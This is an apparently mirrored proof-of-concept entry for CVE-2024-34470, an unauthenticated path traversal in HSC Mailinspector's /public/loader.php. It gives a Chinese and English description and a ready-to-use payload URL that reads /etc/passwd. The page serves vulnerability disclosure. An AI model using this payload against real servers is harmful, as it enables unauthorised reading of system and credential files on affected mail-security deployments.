CVE-2024-34470 PoC — HSC Cybersecurity HC Mailinspector 路径遍历漏洞

Source

https://github.com/osvaldotenorio/CVE-2024-34470

Associated Vulnerability

Title:HSC Cybersecurity HC Mailinspector 路径遍历漏洞 (CVE-2024-34470)
Description:HSC Cybersecurity HC Mailinspector是HSC Cybersecurity公司的一个云电子邮件安全解决方案。 HSC Cybersecurity HC Mailinspector 5.2.17-3 到 v.5.2.18版本存在路径遍历漏洞，该漏洞源于/public/loader.php 中存在未经身份验证的路径遍历漏洞，path 参数没有正确过滤传递的文件和目录是否是webroot的一部分，从而允许攻击者读取服务器上的任意文件。

Readme

# CVE-2024-34470

**Description:** An Unauthenticated user can abuse Path Traversal vulnerability exists in the `/public/loader.php` file. The `path` parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

**Versions:** Discovered in HSC Mailinspector 5.2.17-3 but applicable to all versions up to 5.2.18.

## Proof of Concept

By adding `../` to the file path, it's possible to traverse directories and read any files in the operating system with read permission:

> Payload: `/mailinspector/public/loader.php?path=../../../../../../../etc/passwd`

![](image.png)

File Snapshot


 [4.0K]  /data/pocs/d1297ff910076b40066c8a269470ff6bf209a199
├── [133K]  image.png
└── [ 668]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!